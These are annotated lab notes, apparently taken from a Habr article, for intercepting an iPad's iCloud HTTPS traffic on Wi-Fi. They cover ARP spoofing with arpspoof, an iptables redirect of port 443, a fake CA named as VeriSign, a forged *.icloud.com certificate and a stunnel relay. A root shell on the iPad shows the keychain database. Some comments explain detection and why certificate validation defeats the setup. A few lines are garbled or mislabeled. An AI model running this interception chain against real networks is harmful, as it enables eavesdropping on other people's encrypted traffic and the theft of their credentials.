# Lab notes, not a runnable script: commands entered by hand on the intercepting
# Linux host to place it between one Wi-Fi client and the other address below.
# Turn on IPv4 forwarding so packets that arrive for other hosts are routed onward.
sysctl -w net.ipv4.ip_forward=1
# Same kernel switch written through procfs; it duplicates the sysctl call above.
echo 1 > /proc/sys/net/ipv4/ip_forward
# 192.168.1.101 - iphone
# 192.168.1.101 - (label lost in extraction; the second address used below is
# 192.168.1.1, presumably the gateway - confirm against the source article)
# ARP cache poisoning in both directions over wlan0: the first command targets
# 192.168.1.101 and claims to be 192.168.1.1, the second targets 192.168.1.1 and
# claims to be 192.168.1.101.
# Defender's view: each host ends up caching this machine's MAC for the other's
# IP, so the gateway's MAC appears to change or to be shared by two IPs. ARP
# monitoring on the segment flags that, and switch-level Dynamic ARP Inspection
# or static ARP entries for the gateway prevent it.
arpspoof -i wlan0 -t 192.168.1.101 192.168.1.1
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.101
#
iPad:/private/var/Keychains root# uname -a
Darwin iPad 10.4.0 Darwin Kernel Version 10.4.0: Wed Oct 20 20:14:45 PDT 2010; root:xnu-1504.58.28~3/RELEASE_ARM_S5L8930X iPad1,1 arm K48AP Darwin
iPad:/private/var/Keychains root# pwd
/private/var/Keychains
iPad:/private/var/Keychains root# ls -liahs keychain-2.db
147473 112K -rw------- 1 _securityd wheel 112K Dec 19 00:11 keychain-2.db
( , )
, , .
[20:36:02 dev@sandbox:~/CA]$openssl req -new -x509 -days 3650 -extensions v3_ca -keyout private/cakey.pem -out cacert.pem
Generating a 1024 bit RSA private key
.........................................................................++++++
.........................................++++++
writing new private key to 'private/cakey.pem'
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:VeriSign
Locality Name (eg, city) []:VeriSign Trust Network
Organization Name (eg, company) [Internet Widgits Pty Ltd]:VeriSign Inc
Organizational Unit Name (eg, section) []:Terms of use at www.verisign.com/rpa (c)09
Common Name (eg, YOUR name) []:VeriSign Class 3 Secure Server CA - G2
Email Address []:
[21:10:52 dev@sandbox:~/CA]$openssl req -new -nodes -out my_icloud_apple_req.pem -keyout my_icloud_apple_key.pem
Generating a 1024 bit RSA private key
......++++++
.++++++
writing new private key to 'my_icloud_apple_key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:california
Locality Name (eg, city) []:cupertino
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Apple Inc
Organizational Unit Name (eg, section) []:iTMS
Common Name (eg, YOUR name) []:*.icloud.com
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
[22:42:33 dev@sandbox:~/CA]$openssl x509 -req -days 365 -in my_icloud_apple_req.pem -CA cacert.pem -CAkey private/cakey.pem -set_serial 01 -out my_icloud_apple_cert.pem
Signature ok
subject=/C=US/ST=california/L=cupertino/O=Apple Inc/OU=iTMS/CN=*.icloud.com
Getting CA Private Key
Enter pass phrase for private/cakey.pem:
[22:44:20 dev@sandbox:~/CA]$
# appstore
# Append an unconditional ACCEPT to the FORWARD chain, so every packet routed
# through this host is passed.
iptables -A FORWARD -j ACCEPT
# Redirect TCP traffic with destination port 443 that arrives at this host to
# local port 8443, the port the stunnel [https_s] service further down accepts on.
# The rule has no source or interface match, so it applies to any such traffic,
# not only to the one client named earlier.
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 8443
; stunnel configuration for the intercepting host.
; PID file path. The original comment says it is created inside the chroot jail,
; but no chroot option appears in this excerpt - TODO confirm against the full file.
pid = /stunnel.pid
; Debugging: level 7 with a log file, kept for troubleshooting.
debug = 7
output = /var/log/stunnel.log
; Leaf certificate and private key produced in the openssl transcript above
; (CN=*.icloud.com, signed by the locally created CA in ~/CA).
; Defender's view: that CA is in no client trust store, whatever its subject name
; says, so a client that validates the certificate chain (or pins the expected
; certificate) rejects this endpoint. The setup only works against a client that
; skips or mishandles chain validation.
cert = /home/dev/CA/my_icloud_apple_cert.pem
key = /home/dev/CA/my_icloud_apple_key.pem
; Disable support for the insecure SSLv2 protocol. This is the only protocol
; restriction set in this excerpt.
options = NO_SSLv2
; Server side: accept the redirected HTTPS connections on 8443, terminate TLS
; with the certificate above and pass the decrypted stream to port 9000.
; NOTE(review): whatever listens on 9000 is not shown on this page.
[https_s]
accept = 0.0.0.0:8443
connect = 0.0.0.0:9000
; Client side: accept plaintext on 9500 and open a new TLS connection to the
; upstream HTTPS server (per the original comment, an iCloud endpoint).
[https_c]
client = yes
accept = 0.0.0.0:9500
connect = 17.172.208.53:443
Source: https://habr.com/ru/post/135250/